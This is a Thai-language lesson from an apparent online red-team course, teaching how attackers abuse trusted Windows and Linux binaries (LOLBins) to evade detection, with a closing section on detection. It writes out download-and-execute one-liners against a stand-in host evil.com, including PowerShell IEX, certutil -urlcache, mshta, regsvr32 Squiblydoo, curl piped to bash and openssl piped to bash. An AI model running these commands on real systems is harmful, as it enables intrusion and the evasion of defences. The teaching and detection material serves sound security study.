ไบนารีที่ใช้ประโยชน์จากเครื่องมือในระบบ (LOLBins)
ใช้ไบนารีของ Windows ที่เชื่อถือได้ (certutil, mshta, regsvr32) เพื่อหลบเลี่ยงการตรวจจับ
ไบนารีที่ใช้ประโยชน์จากเครื่องมือในระบบ (LOLBins) เป็นบทเรียน Cyber Security Academy ฟรีบน CoddyKit นี่คือบทเรียนที่ 2 จากทั้งหมด 4 บทเรียน คุณสามารถอ่านบทเรียนทั้งหมดด้านล่างฟรี — จากนั้นลองปฏิบัติด้วยตัวคุณเองในเบราว์เซอร์พร้อมตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7 บทเรียนนี้เป็นส่วนหนึ่งของเส้นทางการเรียน Cyber Security Academy และความก้าวหน้าของคุณจะซิงค์ข้ามเว็บและแอป CoddyKit คอร์ส Cyber Security Academy มีบทเรียนทั้งหมด 4 บทเรียน
LOLBins คืออะไร
ไบนารีที่ใช้ประโยชน์จากเครื่องมือในระบบ (LOLBins) คือไบนารีของ OS และเครื่องมือที่ถูกต้องตามปกติซึ่งผู้โจมตีนำมาปรับใช้เพื่อดำเนินการที่เป็นอันตราย เนื่องจากเครื่องมือเหล่านี้เป็นเครื่องมือระบบที่ได้รับความไว้วางใจและมีลายเซ็น จึงมักหลบเลี่ยงการอนุญาตพิเศษสำหรับแอปพลิเคชันและลดโอกาสการตรวจจับโดย AV/EDR ได้
เหตุใด LOLBins จึงมีประสิทธิภาพ
ข้อได้เปรียบสำหรับผู้โจมตี:
- มีอยู่ในระบบเป้าหมายเสมอ — ไม่จำเป็นต้องนำไฟล์ใหม่ไปวาง
- มีลายเซ็นรับรองโดยไมโครซอฟท์หรือแอปเปิล — หลบเลี่ยงการตรวจจับตามลายเซ็น
- ได้รับความไว้วางใจจากโซลูชันอนุญาตพิเศษสำหรับแอปพลิเคชัน
- สร้างลำดับชั้นกระบวนการที่ดูถูกต้องตามปกติ
PowerShell ในฐานะ LOLBin
PowerShell เป็น LOLBin ที่ถูกนำไปใช้ในทางที่ผิดมากที่สุด ผู้โจมตีใช้เพื่อ:
# Download and execute from memory:
powershell -enc BASE64_ENCODED_COMMAND
powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')"certutil
certutil.exe เป็นเครื่องมือจัดการใบรับรองของ Windows ที่สามารถดาวน์โหลดไฟล์ได้:
# Download file to disk:
certutil -urlcache -split -f http://evil.com/payload.exe C:\temp\payload.exe
# Base64 decode:
certutil -decode encoded.b64 decoded.exemshta และ wscript
การเรียกใช้สคริปต์ผ่านโฮสต์ที่ได้รับความไว้วางใจ:
# mshta: execute HTA application from URL
mshta http://evil.com/payload.hta
# wscript: execute VBScript/JScript
wscript //E:VBScript evil.vbs
# cscript: console script host
cscript //nologo payload.jsregsvr32 Squiblydoo
regsvr32.exe สามารถโหลดและเรียกใช้ DLL จาก URL ระยะไกลผ่านแฟล็ก /s /n /u /i — หลบเลี่ยง AppLocker และเรียกใช้โค้ดที่ไม่มีลายเซ็นในฐานะกระบวนการที่ได้รับความไว้วางใจ:
regsvr32 /s /n /u /i:http://evil.com/payload.sct scrobj.dllการเรียกใช้ผ่าน WMIC และ WMI
Windows Management Instrumentation สามารถเรียกใช้โค้ดจากระยะไกลและภายในเครื่องได้:
# Execute command via WMI:
wmic process call create "powershell.exe -enc PAYLOAD"
# Remote execution:
wmic /node:TARGET process call create "cmd.exe /c payload.exe"Rundll32
rundll32.exe โหลดและเรียกใช้จุดเริ่มต้นของ DLL:
# Execute a DLL export:
rundll32 evil.dll,EntryPoint
# Run JavaScript via rundll32:
rundll32 javascript:"\..\mshtml,RunHTMLApplication " payloadLOLBins บนลินุกซ์
สิ่งที่เทียบเท่ากันบนลินุกซ์:
# curl/wget for downloads:
curl http://evil.com/payload | bash
# Python for execution:
python3 -c "import os; os.system('whoami')"
# OpenSSL for file transfer:
openssl s_client -quiet -connect evil.com:443 | bash
# Find LOLBins: gtfobins.github.ioLOLBAS และ GTFOBins
ฐานข้อมูลอ้างอิง:
- LOLBAS (lolbas-project.github.io) — ไบนารี สคริปต์ และไลบรารีของ Windows
- GTFOBins (gtfobins.github.io) — ไบนารีของลินุกซ์หรือ macOS สำหรับการหาประโยชน์ การอ่านหรือเขียนไฟล์ และการยกระดับสิทธิ์ด้วย SUID
การตรวจจับการใช้ LOLBin ในทางที่ผิด
กลยุทธ์การตรวจจับ:
- การบันทึกบล็อกสคริปต์ของ PowerShell (EventID 4104) — บันทึกคำสั่งที่ถอดรหัสแล้ว
- Sysmon EventID 1: การสร้างกระบวนการพร้อมสายโซ่กระบวนการแม่
- แจ้งเตือนเมื่อกระบวนการแม่กับกระบวนการลูกไม่เป็นไปตามคาด: Word → PowerShell, Excel → cmd
- การเชื่อมต่อเครือข่ายจาก certutil, mshta และ PowerShell
- ใช้ค่าพื้นฐานของ UEBA เพื่อแจ้งการใช้ไบนารีที่ผิดปกติ
ตรวจสอบอย่างรวดเร็ว: LOLBins
ไบนารีของ Windows ใดที่สามารถดาวน์โหลดไฟล์ระยะไกลโดยใช้แฟล็ก -urlcache ได้
สรุปบทเรียน
LOLBins คือเครื่องมือ OS ที่ถูกต้องตามปกติแต่นำมาปรับใช้ในทางที่เป็นอันตราย ได้แก่ PowerShell, certutil, mshta, regsvr32, rundll32 และ WMIC บน Windows รวมถึง curl, python และ OpenSSL บนลินุกซ์ เครื่องมือเหล่านี้หลบเลี่ยงการตรวจจับตามลายเซ็นและการอนุญาตพิเศษสำหรับแอปพลิเคชันได้ การตรวจจับต้องอาศัยการบันทึกการสร้างกระบวนการ (Sysmon) การบันทึกบล็อกสคริปต์ของ PowerShell และค่าพื้นฐานด้านพฤติกรรม LOLBAS และ GTFOBins เป็นฐานข้อมูลอ้างอิงที่สำคัญ
คำถามที่พบบ่อย
บทเรียน “ไบนารีที่ใช้ประโยชน์จากเครื่องมือในระบบ (LOLBins)” ฟรีหรือไม่
ใช่ — ข้อความเต็มของ “ไบนารีที่ใช้ประโยชน์จากเครื่องมือในระบบ (LOLBins)” ฟรีให้อ่านที่นี่บนเว็บ เพื่อปฏิบัติแบบโต้ตอบ (ตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7) และปลดล็อคส่วนที่เหลือของคอร์ส Cyber Security Academy ให้อัปเกรดเป็น CoddyKit PRO คอร์ส Cyber Security Academy มีบทเรียนทั้งหมด 4 บทเรียน
คุณจะเรียนรู้อะไรในบทเรียน “ไบนารีที่ใช้ประโยชน์จากเครื่องมือในระบบ (LOLBins)”
ใช้ไบนารีของ Windows ที่เชื่อถือได้ (certutil, mshta, regsvr32) เพื่อหลบเลี่ยงการตรวจจับ คุณปฏิบัติ Cyber Security Academy ด้วยโค้ดที่ใช้งานได้จริงที่คุณเรียกใช้โดยตรงในเบราว์เซอร์ และติวเตอร์ AI ตลอด 24/7 ตอบคำถามของคุณขณะที่คุณไปผ่านบทเรียน
คุณต้องมีประสบการณ์ก่อนที่จะเริ่มเรียน Cyber Security Academy หรือไม่
ไม่จำเป็นต้องมีประสบการณ์มาก่อน Cyber Security Academy บน CoddyKit ออกแบบมาสำหรับผู้เริ่มต้นไปจนถึงผู้เรียนขั้นสูง คุณสามารถเริ่มต้นที่นี่หรือเริ่มจากตัวแรกและเรียนด้วยความเร็วของคุณเอง นี่คือบทเรียนที่ 2 จากทั้งหมด 4 บทเรียน
บทเรียน “ไบนารีที่ใช้ประโยชน์จากเครื่องมือในระบบ (LOLBins)” ใช้เวลานานแค่ไหน
บทเรียน CoddyKit ส่วนใหญ่ใช้เวลาประมาณ 5–10 นาที แต่ละบทเรียนจึงสั้นและเป็นแบบโต้ตอบ คุณสามารถก้าวหน้าอย่างต่อเนื่องและกลับมาเรียนต่อจากตรงที่เพิ่งหยุดบนเว็บและแอปได้เลย
ฉันเขียนและรันโค้ดในบทเรียน Cyber Security Academy นี้ได้ไหม
ได้ บทเรียน Cyber Security Academy ทุกบทมีตัวแก้ไขโค้ดในตัว คุณจึงเขียนและรันโค้ดจริงได้เลยในเบราว์เซอร์ และได้รับข้อเสนอแนะจาก AI ในทันที — ไม่ต้องติดตั้งในเครื่องของคุณ
บทเรียนทั้งหมดในหลักสูตรนี้
- เฟรมเวิร์ก C2: Cobalt Strike และ Sliver
- ไบนารีที่ใช้ประโยชน์จากเครื่องมือในระบบ (LOLBins)
- เทคนิคการเคลื่อนที่ภายในเครือข่าย
- การเขียนรายงานเรดทีม